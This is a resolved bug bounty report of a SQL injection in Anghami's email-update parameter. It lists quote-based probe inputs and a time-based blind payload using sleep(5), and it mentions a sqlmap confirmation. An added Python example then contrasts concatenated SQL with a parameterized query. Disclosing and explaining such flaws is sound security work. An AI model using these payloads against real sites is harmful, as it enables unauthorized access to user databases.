[https://www.anghami.com/updatemailinfo/] SQL Injection
Unknown
Vulnerability Details
Hi,
I'd like to report a SQL injection issue. First, you need to be logged in in order to exploit this issue.
The vulnerable parameter is **validateemail**.
#### Some tests
- `[email protected]&phoneormail=` => Please Check Your email to verify
- `[email protected]'&phoneormail=` => message disappeared
- `[email protected]''&phoneormail=` => Please Check Your email to verify
- `[email protected]' or sleep(5) #&sid=0&lang=en&phoneormail=` => server timeout
### POC
DB version: MySQL 5.0.11
You can find a screenshot from the sqlmap scan confirming the issue.
Thanks
Report Stats
- Report ID: 86468
- State: Closed
- Substate: resolved
- Upvotes: 3
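The quote behaviour in the report's tests (one quote changes the response, two quotes restore it) is the signature of a parameter concatenated into SQL text. The following is an added example, not code from the report or from Anghami: it reproduces that pattern beside the parameterized fix, using SQLite as an offline stand-in for MySQL, with a hypothetical `users` table, hypothetical function names and a constructed address.

```python
import sqlite3

# Constructed stand-in for the backend. The report's target ran MySQL;
# SQLite is used here only so the example runs offline. The table layout
# and the address below are assumptions, not taken from the report.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)")
    db.execute("INSERT INTO users (email) VALUES ('user@example.test')")
    return db

def lookup_concatenated(db, validateemail):
    """Vulnerable pattern: the parameter is pasted into the SQL text."""
    sql = "SELECT id FROM users WHERE email = '" + validateemail + "'"
    try:
        db.execute(sql).fetchall()
        return "ok"
    except sqlite3.Error:
        # An unbalanced quote breaks the statement, so the normal
        # response is lost (the "message disappeared" case).
        return "sql-error"

def lookup_parameterized(db, validateemail):
    """Hardened pattern: the value is bound and never parsed as SQL."""
    try:
        db.execute("SELECT id FROM users WHERE email = ?",
                   (validateemail,)).fetchall()
        return "ok"
    except sqlite3.Error:
        return "sql-error"

def probe(lookup):
    """Send the report's three quote variants through one lookup."""
    db = make_db()
    base = "user@example.test"
    return [lookup(db, base + suffix) for suffix in ("", "'", "''")]

if __name__ == "__main__":
    print("concatenated :", probe(lookup_concatenated))
    print("parameterized:", probe(lookup_parameterized))
```

With bound parameters all three inputs are treated as plain data, so the response no longer depends on how many quotes the value contains.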